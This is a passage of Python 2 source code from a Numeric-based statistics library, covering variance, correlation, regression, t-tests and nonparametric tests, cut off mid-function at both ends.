lower and upper limits on values to include.
Usage: acumfreq(a,numbins=10,defaultreallimits=None)
Returns: array of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(a,numbins,defaultreallimits)
cumhist = cumsum(h*1)
return cumhist,l,b,e
def arelfreq(a,numbins=10,defaultreallimits=None):
"""
Returns a relative frequency histogram, using the histogram function.
Defaultreallimits can be None (use all data), or a 2-sequence containing
lower and upper limits on values to include.
Usage: arelfreq(a,numbins=10,defaultreallimits=None)
Returns: array of relative freq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(a,numbins,defaultreallimits)
h = N.array(h/float(a.shape[0]))
return h,l,b,e
#####################################
###### AVARIABILITY FUNCTIONS #####
#####################################
def aobrientransform(*args):
"""
Computes a transform on input data (any number of columns). Used to
test for homogeneity of variance prior to running one-way stats. Each
array in *args is one level of a factor. If an F_oneway() run on the
transformed data and found significant, variances are unequal. From
Maxwell and Delaney, p.112.
Usage: aobrientransform(*args) *args = 1D arrays, one per level of factor
Returns: transformed data for use in an ANOVA
"""
TINY = 1e-10
k = len(args)
n = N.zeros(k,N.Float)
v = N.zeros(k,N.Float)
m = N.zeros(k,N.Float)
nargs = []
for i in range(k):
nargs.append(args[i].astype(N.Float))
n[i] = float(len(nargs[i]))
v[i] = var(nargs[i])
m[i] = mean(nargs[i])
for j in range(k):
for i in range(int(n[j])): # n holds floats; range() needs an int
t1 = (n[j]-1.5)*n[j]*(nargs[j][i]-m[j])**2
t2 = 0.5*v[j]*(n[j]-1.0)
t3 = (n[j]-1.0)*(n[j]-2.0)
nargs[j][i] = (t1-t2) / float(t3)
check = 1
for j in range(k):
if v[j] - mean(nargs[j]) > TINY:
check = 0
if check <> 1:
raise ValueError, 'Lack of convergence in obrientransform.'
else:
return N.array(nargs)
def asamplevar (inarray,dimension=None,keepdims=0):
"""
Returns the sample variance of the values in the passed
array (i.e., using N). Dimension can equal None (ravel array first),
an integer (the dimension over which to operate), or a sequence
(operate over multiple dimensions). Set keepdims=1 to return an array
with the same number of dimensions as inarray.
Usage: asamplevar(inarray,dimension=None,keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
if dimension == 1:
mn = amean(inarray,dimension)[:,N.NewAxis]
else:
mn = amean(inarray,dimension,keepdims=1)
deviations = inarray - mn
if type(dimension) == ListType:
n = 1
for d in dimension:
n = n*inarray.shape[d]
else:
n = inarray.shape[dimension]
svar = ass(deviations,dimension,keepdims) / float(n)
return svar
def asamplestdev (inarray, dimension=None, keepdims=0):
"""
Returns the sample standard deviation of the values in the passed
array (i.e., using N). Dimension can equal None (ravel array first),
an integer (the dimension over which to operate), or a sequence
(operate over multiple dimensions). Set keepdims=1 to return an array
with the same number of dimensions as inarray.
Usage: asamplestdev(inarray,dimension=None,keepdims=0)
"""
return N.sqrt(asamplevar(inarray,dimension,keepdims))
def asignaltonoise(instack,dimension=0):
"""
Calculates signal-to-noise. Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions).
Usage: asignaltonoise(instack,dimension=0)
Returns: array containing the value of (mean/stdev) along dimension,
or 0 when stdev=0
"""
m = mean(instack,dimension)
sd = stdev(instack,dimension)
return N.where(N.equal(sd,0),0,m/sd)
def avar (inarray, dimension=None,keepdims=0):
"""
Returns the estimated population variance of the values in the passed
array (i.e., N-1). Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions). Set keepdims=1 to return an array with the
same number of dimensions as inarray.
Usage: avar(inarray,dimension=None,keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
mn = amean(inarray,dimension,1)
deviations = inarray - mn
if type(dimension) == ListType:
n = 1
for d in dimension:
n = n*inarray.shape[d]
else:
n = inarray.shape[dimension]
var = ass(deviations,dimension,keepdims)/float(n-1)
return var
def astdev (inarray, dimension=None, keepdims=0):
"""
Returns the estimated population standard deviation of the values in
the passed array (i.e., N-1). Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions). Set keepdims=1 to return
an array with the same number of dimensions as inarray.
Usage: astdev(inarray,dimension=None,keepdims=0)
"""
return N.sqrt(avar(inarray,dimension,keepdims))
def asterr (inarray, dimension=None, keepdims=0):
"""
Returns the estimated population standard error of the values in the
passed array (i.e., N-1). Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions). Set keepdims=1 to return
an array with the same number of dimensions as inarray.
Usage: asterr(inarray,dimension=None,keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
return astdev(inarray,dimension,keepdims) / float(N.sqrt(inarray.shape[dimension]))
def asem (inarray, dimension=None, keepdims=0):
"""
Returns the standard error of the mean (i.e., using N) of the values
in the passed array. Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions). Set keepdims=1 to return an array with the
same number of dimensions as inarray.
Usage: asem(inarray,dimension=None, keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
if type(dimension) == ListType:
n = 1
for d in dimension:
n = n*inarray.shape[d]
else:
n = inarray.shape[dimension]
s = asamplestdev(inarray,dimension,keepdims) / N.sqrt(n-1)
return s
def az (a, score):
"""
Returns the z-score of a given input score, given the array from which
that score came. Not appropriate for population calculations, nor for
arrays > 1D.
Usage: az(a, score)
"""
z = (score-amean(a)) / asamplestdev(a)
return z
def azs (a):
"""
Returns a 1D array of z-scores, one for each score in the passed array,
computed relative to the passed array.
Usage: azs(a)
"""
zscores = []
for item in a:
zscores.append(z(a,item))
return N.array(zscores)
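# Hedged example (mean 2, sample stdev sqrt(2/3.) ~ 0.8165):
#   >>> azs(N.array([1., 2., 3.]))
#   array([-1.2247...,  0.,  1.2247...])   # up to float rounding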
def azmap (scores, compare, dimension=0):
"""
Returns an array of z-scores the shape of scores (e.g., [x,y]), compared to
array passed to compare (e.g., [time,x,y]). Assumes collapsing over dim 0
of the compare array.
Usage: azmap(scores, compare, dimension=0)
"""
mns = amean(compare,dimension)
sstd = asamplestdev(compare,0)
return (scores - mns) / sstd
#####################################
####### ATRIMMING FUNCTIONS #######
#####################################
def around(a,digits=1):
"""
Rounds all values in array a to 'digits' decimal places.
Usage: around(a,digits)
Returns: a, where each value is rounded to 'digits' decimals
"""
def ar(x,d=digits):
return round(x,d)
if type(a) <> N.ArrayType:
try:
a = N.array(a)
except:
a = N.array(a,'O')
shp = a.shape
if a.typecode() in ['f','F','d','D']:
b = N.ravel(a)
b = N.array(map(ar,b))
b.shape = shp
elif a.typecode() in ['o','O']:
b = N.ravel(a)*1
for i in range(len(b)):
if type(b[i]) == FloatType:
b[i] = round(b[i],digits)
b.shape = shp
else: # not a float, double or Object array
b = a*1
return b
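# Illustrative check (element-wise rounding to 1 decimal place):
#   >>> around(N.array([1.234, 5.678]), digits=1)
#   array([ 1.2,  5.7])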
def athreshold(a,threshmin=None,threshmax=None,newval=0):
"""
Like Numeric.clip() except that values <threshmin or >threshmax are replaced
by newval instead of by threshmin/threshmax (respectively).
Usage: athreshold(a,threshmin=None,threshmax=None,newval=0)
Returns: a, with values <threshmin or >threshmax replaced with newval
"""
mask = N.zeros(a.shape)
if threshmin <> None:
mask = mask + N.where(N.less(a,threshmin),1,0)
if threshmax <> None:
mask = mask + N.where(N.greater(a,threshmax),1,0)
mask = N.clip(mask,0,1)
return N.where(mask,newval,a)
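# Hedged example (values outside [2, 8] become newval, unlike clip):
#   >>> athreshold(N.array([1, 5, 9]), threshmin=2, threshmax=8, newval=0)
#   array([0, 5, 0])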
def atrimboth (a,proportiontocut):
"""
Slices off the passed proportion of items from BOTH ends of the passed
array (i.e., with proportiontocut=0.1, slices 'leftmost' 10% AND
'rightmost' 10% of scores). You must pre-sort the array if you want
"proper" trimming. Slices off LESS if proportion results in a
non-integer slice index (i.e., conservatively slices off
proportiontocut).
Usage: atrimboth (a,proportiontocut)
Returns: trimmed version of array a
"""
lowercut = int(proportiontocut*len(a))
uppercut = len(a) - lowercut
return a[lowercut:uppercut]
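# Illustrative check: int(0.1*10) == 1 value is dropped from each end:
#   >>> atrimboth(N.arange(10), 0.1)
#   array([1, 2, 3, 4, 5, 6, 7, 8])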
def atrim1 (a,proportiontocut,tail='right'):
"""
Slices off the passed proportion of items from ONE end of the passed
array (i.e., if proportiontocut=0.1, slices off 'leftmost' or 'rightmost'
10% of scores). Slices off LESS if proportion results in a non-integer
slice index (i.e., conservatively slices off proportiontocut).
Usage: atrim1(a,proportiontocut,tail='right') or set tail='left'
Returns: trimmed version of array a
"""
if string.lower(tail) == 'right':
lowercut = 0
uppercut = len(a) - int(proportiontocut*len(a))
elif string.lower(tail) == 'left':
lowercut = int(proportiontocut*len(a))
uppercut = len(a)
return a[lowercut:uppercut]
#####################################
##### ACORRELATION FUNCTIONS ######
#####################################
def acovariance(X):
"""
Computes the covariance matrix of a matrix X. Requires a 2D matrix input.
Usage: acovariance(X)
Returns: covariance matrix of X
"""
if len(X.shape) <> 2:
raise TypeError, "acovariance requires 2D matrices"
n = X.shape[0]
mX = amean(X,0)
return N.dot(N.transpose(X),X) / float(n) - N.multiply.outer(mX,mX)
def acorrelation(X):
"""
Computes the correlation matrix of a matrix X. Requires a 2D matrix input.
Usage: acorrelation(X)
Returns: correlation matrix of X
"""
C = acovariance(X)
V = N.diagonal(C)
return C / N.sqrt(N.multiply.outer(V,V))
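# Hedged example (column 2 is exactly 2x column 1, so all correlations are 1):
#   >>> X = N.array([[1., 2.], [2., 4.], [3., 6.]])
#   >>> acorrelation(X)
#   [[1. 1.], [1. 1.]]        # up to float rounding / Numeric repr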
def apaired(x,y):
"""
Interactively determines the type of data in x and y, and then runs the
appropriate statistic for paired group data.
Usage: apaired(x,y) x,y = the two arrays of values to be compared
Returns: appropriate statistic name, value, and probability
"""
samples = ''
while samples not in ['i','r','I','R','c','C']:
print '\nIndependent or related samples, or correlation (i,r,c): ',
samples = raw_input()
if samples in ['i','I','r','R']:
print '\nComparing variances ...',
# USE O'BRIEN'S TEST FOR HOMOGENEITY OF VARIANCE, Maxwell & Delaney, p.112
r = obrientransform(x,y)
f,p = F_oneway(pstat.colex(r,0),pstat.colex(r,1))
if p<0.05:
vartype='unequal, p='+str(round(p,4))
else:
vartype='equal'
print vartype
if samples in ['i','I']:
if vartype[0]=='e':
t,p = ttest_ind(x,y,None,0)
print '\nIndependent samples t-test: ', round(t,4),round(p,4)
else:
if len(x)>20 or len(y)>20:
z,p = ranksums(x,y)
print '\nRank Sums test (NONparametric, n>20): ', round(z,4),round(p,4)
else:
u,p = mannwhitneyu(x,y)
print '\nMann-Whitney U-test (NONparametric, ns<20): ', round(u,4),round(p,4)
else: # RELATED SAMPLES
if vartype[0]=='e':
t,p = ttest_rel(x,y,0)
print '\nRelated samples t-test: ', round(t,4),round(p,4)
else:
t,p = wilcoxont(x,y) # Wilcoxon T for related samples (ranksums is for independent groups)
print '\nWilcoxon T-test (NONparametric): ', round(t,4),round(p,4)
else: # CORRELATION ANALYSIS
corrtype = ''
while corrtype not in ['c','C','r','R','d','D']:
print '\nIs the data Continuous, Ranked, or Dichotomous (c,r,d): ',
corrtype = raw_input()
if corrtype in ['c','C']:
m,b,r,p,see = linregress(x,y)
print '\nLinear regression for continuous variables ...'
lol = [['Slope','Intercept','r','Prob','SEestimate'],[round(m,4),round(b,4),round(r,4),round(p,4),round(see,4)]]
pstat.printcc(lol)
elif corrtype in ['r','R']:
r,p = spearmanr(x,y)
print '\nCorrelation for ranked variables ...'
print "Spearman's r: ",round(r,4),round(p,4)
else: # DICHOTOMOUS
r,p = pointbiserialr(x,y)
print '\nAssuming x contains a dichotomous variable ...'
print 'Point Biserial r: ',round(r,4),round(p,4)
print '\n\n'
return None
def apearsonr(x,y,verbose=1):
"""
Calculates a Pearson correlation coefficient and its two-tailed p-value. Taken
from Heiman's Basic Statistics for the Behav. Sci (2nd), p.195.
Usage: apearsonr(x,y,verbose=1) where x,y are equal length arrays
Returns: Pearson's r, two-tailed p-value
"""
TINY = 1.0e-20
n = len(x)
xmean = amean(x)
ymean = amean(y)
r_num = n*(N.add.reduce(x*y)) - N.add.reduce(x)*N.add.reduce(y)
r_den = math.sqrt((n*ass(x) - asquare_of_sums(x))*(n*ass(y)-asquare_of_sums(y)))
r = (r_num / r_den)
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = abetai(0.5*df,0.5,df/(df+t*t),verbose)
return r,prob
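# Quick sanity check (perfectly linear data => r == 1.0, p ~ 0):
#   >>> apearsonr(N.array([1., 2., 3.]), N.array([2., 4., 6.]))
#   (1.0, ~0.0)               # perfect positive correlation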
def aspearmanr(x,y):
"""
Calculates a Spearman rank-order correlation coefficient. Taken
from Heiman's Basic Statistics for the Behav. Sci (1st), p.192.
Usage: aspearmanr(x,y) where x,y are equal-length arrays
Returns: Spearman's r, two-tailed p-value
"""
TINY = 1e-30
n = len(x)
rankx = rankdata(x)
ranky = rankdata(y)
dsq = N.add.reduce((rankx-ranky)**2)
rs = 1 - 6*dsq / float(n*(n**2-1))
t = rs * math.sqrt((n-2) / ((rs+1.0)*(1.0-rs)))
df = n-2
probrs = abetai(0.5*df,0.5,df/(df+t*t))
# probability values for rs are from part 2 of the spearman function in
# Numerical Recipes, p.510. They are close to tables, but not exact.(?)
return rs, probrs
def apointbiserialr(x,y):
"""
Calculates a point-biserial correlation coefficient and the associated
probability value. Taken from Heiman's Basic Statistics for the Behav.
Sci (1st), p.194.
Usage: apointbiserialr(x,y) where x,y are equal length arrays
Returns: Point-biserial r, two-tailed p-value
"""
TINY = 1e-30
categories = pstat.aunique(x)
data = pstat.aabut(x,y)
if len(categories) <> 2:
raise ValueError, "Exactly 2 categories required (in x) for pointbiserialr()."
else: # there are 2 categories, continue
codemap = pstat.aabut(categories,N.arange(2))
recoded = pstat.arecode(data,codemap,0)
x = pstat.alinexand(data,0,categories[0])
y = pstat.alinexand(data,0,categories[1])
xmean = amean(pstat.acolex(x,1))
ymean = amean(pstat.acolex(y,1))
n = len(data)
adjust = math.sqrt((len(x)/float(n))*(len(y)/float(n)))
rpb = (ymean - xmean)/asamplestdev(pstat.acolex(data,1))*adjust
df = n-2
t = rpb*math.sqrt(df/((1.0-rpb+TINY)*(1.0+rpb+TINY)))
prob = abetai(0.5*df,0.5,df/(df+t*t))
return rpb, prob
def akendalltau(x,y):
"""
Calculates Kendall's tau ... correlation of ordinal data. Adapted
from function kendl1 in Numerical Recipes. Needs good test-cases.@@@
Usage: akendalltau(x,y)
Returns: Kendall's tau, two-tailed p-value
"""
n1 = 0
n2 = 0
iss = 0
for j in range(len(x)-1):
for k in range(j,len(y)):
a1 = x[j] - x[k]
a2 = y[j] - y[k]
aa = a1 * a2
if (aa): # neither array has a tie
n1 = n1 + 1
n2 = n2 + 1
if aa > 0:
iss = iss + 1
else:
iss = iss -1
else:
if (a1):
n1 = n1 + 1
else:
n2 = n2 + 1
tau = iss / math.sqrt(n1*n2)
svar = (4.0*len(x)+10.0) / (9.0*len(x)*(len(x)-1))
z = tau / math.sqrt(svar)
prob = erfcc(abs(z)/1.4142136)
return tau, prob
def alinregress(*args):
"""
Calculates a regression line on two arrays, x and y, corresponding to x,y
pairs. If a single 2D array is passed, alinregress finds dim with 2 levels
and splits data into x,y pairs along that dim.
Usage: alinregress(*args) args=2 equal-length arrays, or one 2D array
Returns: slope, intercept, r, two-tailed prob, sterr-of-the-estimate
"""
TINY = 1.0e-20
if len(args) == 1: # more than 1D array?
args = args[0]
if len(args) == 2:
x = args[0]
y = args[1]
else:
x = args[:,0]
y = args[:,1]
else:
x = args[0]
y = args[1]
n = len(x)
xmean = amean(x)
ymean = amean(y)
r_num = n*(N.add.reduce(x*y)) - N.add.reduce(x)*N.add.reduce(y)
r_den = math.sqrt((n*ass(x) - asquare_of_sums(x))*(n*ass(y)-asquare_of_sums(y)))
r = r_num / r_den
z = 0.5*math.log((1.0+r+TINY)/(1.0-r+TINY))
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = abetai(0.5*df,0.5,df/(df+t*t))
slope = r_num / (float(n)*ass(x) - asquare_of_sums(x))
intercept = ymean - slope*xmean
sterrest = math.sqrt(1-r*r)*asamplestdev(y)
return slope, intercept, r, prob, sterrest
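# Worked example, not from the original source (y = 2x + 1 exactly):
#   >>> alinregress(N.array([0., 1., 2.]), N.array([1., 3., 5.]))
#   (2.0, 1.0, 1.0, ~0.0, 0.0)    # slope, intercept, r, prob, sterrest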
#####################################
##### AINFERENTIAL STATISTICS #####
#####################################
def attest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):
"""
Calculates the t-obtained for the independent samples T-test on ONE group
of scores a, given a population mean. If printit=1, results are printed
to the screen. If printit='filename', the results are output to 'filename'
using the given writemode (default=append). Returns t-value, and prob.
Usage: attest_1samp(a,popmean,printit=0,name='Sample',writemode='a')
Returns: t-value, two-tailed prob
"""
if type(a) != N.ArrayType:
a = N.array(a)
x = amean(a)
v = avar(a)
n = len(a)
df = n-1
svar = ((n-1)*v) / float(df)
t = (x-popmean)/math.sqrt(svar*(1.0/n))
prob = abetai(0.5*df,0.5,df/(df+t*t))
if printit <> 0:
statname = 'Single-sample T-test.'
outputpairedstats(printit,writemode,
'Population','--',popmean,0,0,0,
name,n,x,v,N.minimum.reduce(N.ravel(a)),
N.maximum.reduce(N.ravel(a)),
statname,t,prob)
return t,prob
def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):
"""
Calculates the t-obtained T-test on TWO INDEPENDENT samples of scores
a, and b. From Numerical Recipes, p.483. If printit=1, results are
printed to the screen. If printit='filename', the results are output
to 'filename' using the given writemode (default=append). Dimension
can equal None (ravel array first), or an integer (the dimension over
which to operate on a and b).
Usage: attest_ind (a,b,dimension=None,printit=0,
name1='Samp1',name2='Samp2',writemode='a')
Returns: t-value, two-tailed p-value
"""
if dimension == None:
a = N.ravel(a)
b = N.ravel(b)
dimension = 0
x1 = amean(a,dimension)
x2 = amean(b,dimension)
v1 = avar(a,dimension)
v2 = avar(b,dimension)
n1 = a.shape[dimension]
n2 = b.shape[dimension]
df = n1+n2-2
svar = ((n1-1)*v1+(n2-1)*v2) / float(df)
zerodivproblem = N.equal(svar,0)
svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place
t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!
t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0
probs = abetai(0.5*df,0.5,float(df)/(df+t*t))
if type(t) == N.ArrayType:
probs = N.reshape(probs,t.shape)
if len(probs) == 1:
probs = probs[0]
if printit <> 0:
if type(t) == N.ArrayType:
t = t[0]
if type(probs) == N.ArrayType:
probs = probs[0]
statname = 'Independent samples T-test.'
outputpairedstats(printit,writemode,
name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),
N.maximum.reduce(N.ravel(a)),
name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),
N.maximum.reduce(N.ravel(b)),
statname,t,probs)
return
return t, probs
def attest_rel (a,b,dimension=None,printit=0,name1='Samp1',name2='Samp2',writemode='a'):
"""
Calculates the t-obtained T-test on TWO RELATED samples of scores, a
and b. From Numerical Recipes, p.483. If printit=1, results are
printed to the screen. If printit='filename', the results are output
to 'filename' using the given writemode (default=append). Dimension
can equal None (ravel array first), or an integer (the dimension over
which to operate on a and b).
Usage: attest_rel(a,b,dimension=None,printit=0,
name1='Samp1',name2='Samp2',writemode='a')
Returns: t-value, two-tailed p-value
"""
if dimension == None:
a = N.ravel(a)
b = N.ravel(b)
dimension = 0
if len(a)<>len(b):
raise ValueError, 'Unequal length arrays.'
x1 = amean(a,dimension)
x2 = amean(b,dimension)
v1 = avar(a,dimension)
v2 = avar(b,dimension)
n = a.shape[dimension]
df = float(n-1)
d = (a-b).astype('d')
denom = N.sqrt((n*N.add.reduce(d*d,dimension) - N.add.reduce(d,dimension)**2) /df)
zerodivproblem = N.equal(denom,0)
denom = N.where(zerodivproblem,1,denom) # avoid zero-division in 1st place
t = N.add.reduce(d,dimension) / denom # N-D COMPUTATION HERE!!!!!!
t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0
probs = abetai(0.5*df,0.5,float(df)/(df+t*t))
if type(t) == N.ArrayType:
probs = N.reshape(probs,t.shape)
if len(probs) == 1:
probs = probs[0]
if printit <> 0:
statname = 'Related samples T-test.'
outputpairedstats(printit,writemode,
name1,n,x1,v1,N.minimum.reduce(N.ravel(a)),
N.maximum.reduce(N.ravel(a)),
name2,n,x2,v2,N.minimum.reduce(N.ravel(b)),
N.maximum.reduce(N.ravel(b)),
statname,t,probs)
return
return t, probs
def achisquare(f_obs,f_exp=None):
"""
Calculates a one-way chi square for array of observed frequencies and returns
the result. If no expected frequencies are given, the total N is assumed to
be equally distributed across all groups.
Usage: achisquare(f_obs, f_exp=None) f_obs = array of observed cell freq.
Returns: chisquare-statistic, associated p-value
"""
k = len(f_obs)
if f_exp == None:
f_exp = N.array([sum(f_obs)/float(k)] * len(f_obs),N.Float)
f_exp = f_exp.astype(N.Float)
chisq = N.add.reduce((f_obs-f_exp)**2 / f_exp)
return chisq, chisqprob(chisq, k-1)
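# Hedged example (default expected freq = 60/3 = 20 per cell, df = 2):
#   >>> achisquare(N.array([10., 20., 30.]))
#   (10.0, 0.0067...)             # chisq = (100+0+100)/20; p = exp(-5)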
def aks_2samp (data1,data2):
"""
Computes the Kolmogorov-Smirnov statistic on 2 samples. Modified from
Numerical Recipes in C, page 493. Returns KS D-value, prob. Not ufunc-
like.
Usage: aks_2samp(data1,data2) where data1 and data2 are 1D arrays
Returns: KS D-value, p-value
"""
j1 = 0 # N.zeros(data1.shape[1:]) TRIED TO MAKE THIS UFUNC-LIKE
j2 = 0 # N.zeros(data2.shape[1:])
fn1 = 0.0 # N.zeros(data1.shape[1:],N.Float)
fn2 = 0.0 # N.zeros(data2.shape[1:],N.Float)
n1 = data1.shape[0]
n2 = data2.shape[0]
en1 = n1*1
en2 = n2*1
d = N.zeros(data1.shape[1:],N.Float)
data1 = N.sort(data1,0)
data2 = N.sort(data2,0)
while j1 < n1 and j2 < n2:
d1=data1[j1]
d2=data2[j2]
if d1 <= d2:
fn1 = (j1)/float(en1)
j1 = j1 + 1
if d2 <= d1:
fn2 = (j2)/float(en2)
j2 = j2 + 1
dt = (fn2-fn1)
if abs(dt) > abs(d):
d = dt
try:
en = math.sqrt(en1*en2/float(en1+en2))
prob = aksprob((en+0.12+0.11/en)*N.fabs(d))
except:
prob = 1.0
return d, prob
def amannwhitneyu(x,y):
"""
Calculates a Mann-Whitney U statistic on the provided scores and
returns the result. Use only when the n in each condition is < 20 and
you have 2 independent samples of ranks. REMEMBER: Mann-Whitney U is
significant if the u-obtained is LESS THAN or equal to the critical
value of U.
Usage: amannwhitneyu(x,y) where x,y are arrays of values for 2 conditions
Returns: u-statistic, one-tailed p-value (i.e., p(z(U)))
"""
n1 = len(x)
n2 = len(y)
ranked = rankdata(N.concatenate((x,y)))
rankx = ranked[0:n1] # get the x-ranks
ranky = ranked[n1:] # the rest are y-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - sum(rankx) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
bigu = max(u1,u2)
smallu = min(u1,u2)
T = math.sqrt(tiecorrect(ranked)) # correction factor for tied scores
if T == 0:
raise ValueError, 'All numbers are identical in amannwhitneyu'
sd = math.sqrt(T*n1*n2*(n1+n2+1)/12.0)
z = abs((bigu-n1*n2/2.0) / sd) # normal approximation for prob calc
return smallu, 1.0 - zprob(z)
def atiecorrect(rankvals):
"""
Tie-corrector for ties in Mann Whitney U and Kruskal Wallis H tests.
See Siegel, S. (1956) Nonparametric Statistics for the Behavioral
Sciences. New York: McGraw-Hill. Code adapted from |Stat rankind.c
code.
Usage: atiecorrect(rankvals)
Returns: T correction factor for U or H
"""
sorted,posn = ashellsort(N.array(rankvals))
n = len(sorted)
T = 0.0
i = 0
while (i<n-1):
if sorted[i] == sorted[i+1]:
nties = 1
while (i<n-1) and (sorted[i] == sorted[i+1]):
nties = nties +1
i = i +1
T = T + nties**3 - nties
i = i+1
T = T / float(n**3-n)
return 1.0 - T
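# Illustrative check: one tie of size 2 among n=4 ranks gives
# T = 1 - (2**3 - 2)/float(4**3 - 4) == 0.9:
#   >>> atiecorrect([1, 2, 2, 3])
#   0.9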
def aranksums(x,y):
"""
Calculates the rank sums statistic on the provided scores and returns
the result.
Usage: aranksums(x,y) where x,y are arrays of values for 2 conditions
Returns: z-statistic, two-tailed p-value
"""
n1 = len(x)
n2 = len(y)
alldata = N.concatenate((x,y))
ranked = arankdata(alldata)
x = ranked[:n1]
y = ranked[n1:]
s = sum(x)
expected = n1*(n1+n2+1) / 2.0
z = (s - expected) / math.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2*(1.0 -zprob(abs(z)))
return z, prob
def awilcoxont(x,y):
"""
Calculates the Wilcoxon T-test for related samples and returns the
result. A non-parametric T-test.
Usage: awilcoxont(x,y) where x,y are equal-length arrays for 2 conditions
Returns: t-statistic, two-tailed p-value
"""
if len(x) <> len(y):
raise ValueError, 'Unequal N in awilcoxont. Aborting.'
d = x-y
d = N.compress(N.not_equal(d,0),d) # Keep all non-zero differences
count = len(d)
absd = abs(d)
absranked = arankdata(absd)
r_plus = 0.0
r_minus = 0.0
for i in range(len(absd)):
if d[i] < 0:
r_minus = r_minus + absranked[i]
else:
r_plus = r_plus + absranked[i]
wt = min(r_plus, r_minus)
mn = count * (count+1) * 0.25
se = math.sqrt(count*(count+1)*(2.0*count+1.0)/24.0)
z = math.fabs(wt-mn) / se
prob = 2*(1.0 -zprob(abs(z)))
return wt, prob
def akruskalwallish(*args):
"""
The Kruskal-Wallis H-test is a non-parametric ANOVA for 3 or more
groups, requiring at least 5 subjects in each group. This function
calculates the Kruskal-Wallis H and associated p-value for 3 or more
independent samples.
Usage: akruskalwallish(*args) args are separate arrays for 3+ conditions
Returns: H-statistic (corrected for ties), associated p-value
"""
assert len(args) >= 3, "Need at least 3 groups in stats.akruskalwallish()"
args = list(args)
n = [0]*len(args)
n = map(len,args)
all = []
for i in range(len(args)):
all = all + args[i].tolist()
ranked = rankdata(all)
T = tiecorrect(ranked)
for i in range(len(args)):
args[i] = ranked[0:n[i]]
del ranked[0:n[i]]
rsums = []
for i in range(len(args)):
rsums.append(sum(args[i])**2)
rsums[i] = rsums[i] / float(n[i])
ssbn = sum(rsums)
totaln = sum(n)
h = 12.0 / (totaln*(totaln+1)) * ssbn - 3*(totaln+1)
df = len(args) - 1
if T == 0:
raise ValueError, 'All numbers are identical in akruskalwallish'
h = h / float(T)
return h, chisqprob(h,df)
def afriedmanchisquare(*args):
"""
Friedman Chi-Square is a non-parametric, one-way within-subjects
ANOVA. This function calculates the Friedman Chi-square test for
repeated measures and returns the result, along with the associated
probability value. It assumes 3 or more repeated measures. With only 3
levels, a minimum of 10 subjects in the study is required; four levels
requires 5 subjects per level(??).
Usage: afriedmanchisquare(*args) args are separate arrays for 2+ conditions
Returns: chi-square statistic, associated p-value
"""
k = len(args)
if k < 3:
raise ValueError, '\nLess than 3 levels. Friedman test not appropriate.\n'
n = len(args[0])
data = apply(pstat.aabut,args)
data = data.astype(N.Float)
for i in range(len(data)):
data[i] = arankdata(data[i])
ssbn = asum(asum(data,0)**2) # squared rank-sums per condition, from the ranked data (not raw args)
chisq = 12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)
return chisq, chisqprob(chisq,k-1)
#####################################
#### APROBABILITY CALCULATIONS ####
#####################################
def achisqprob(chisq,df):
"""
Returns the (1-tail) probability value associated with the provided chi-square
value and df. Heavily modified from chisq.c in Gary Perlman's |Stat. Can
handle multiple dimensions.
Usage: achisqprob(chisq,df) chisq=chisquare stat., df=degrees of freedom
"""
BIG = 200.0
def ex(x):
BIG = 200.0
exponents = N.where(N.less(x,-BIG),-BIG,x)
return N.exp(exponents)
if type(chisq) == N.ArrayType:
arrayflag = 1
else:
arrayflag = 0
chisq = N.array([chisq])
if df < 1:
return N.ones(chisq.shape,N.Float) # N.Float, not the nonexistent N.float
probs = N.zeros(chisq.shape,N.Float)
probs = N.where(N.less_equal(chisq,0),1.0,probs) # set prob=1 for chisq<0
a = 0.5 * chisq
if df > 1:
y = ex(-a)
if df%2 == 0:
even = 1
s = y*1
s2 = s*1
else:
even = 0
s = 2.0 * azprob(-N.sqrt(chisq))
s2 = s*1
if (df > 2):
chisq = 0.5 * (df - 1.0)
if even:
z = N.ones(probs.shape,N.Float)
else:
z = 0.5 *N.ones(probs.shape,N.Float)
if even:
e = N.zeros(probs.shape,N.Float)
else:
e = N.log(N.sqrt(N.pi)) *N.ones(probs.shape,N.Float)
c = N.log(a)
mask = N.zeros(probs.shape)
a_big = N.greater(a,BIG)
a_big_frozen = -1 *N.ones(probs.shape,N.Float)
totalelements = N.multiply.reduce(N.array(probs.shape))
while asum(mask)<>totalelements:
e = N.log(z) + e
s = s + ex(c*z-a-e)
z = z + 1.0
# print z, e, s
newmask = N.greater(z,chisq)
a_big_frozen = N.where(newmask*N.equal(mask,0)*a_big, s, a_big_frozen)
mask = N.clip(newmask+mask,0,1)
if even:
z = N.ones(probs.shape,N.Float)
e = N.ones(probs.shape,N.Float)
else:
z = 0.5 *N.ones(probs.shape,N.Float)
e = 1.0 / N.sqrt(N.pi) / N.sqrt(a) * N.ones(probs.shape,N.Float)
c = 0.0
mask = N.zeros(probs.shape)
a_notbig_frozen = -1 *N.ones(probs.shape,N.Float)
while asum(mask)<>totalelements:
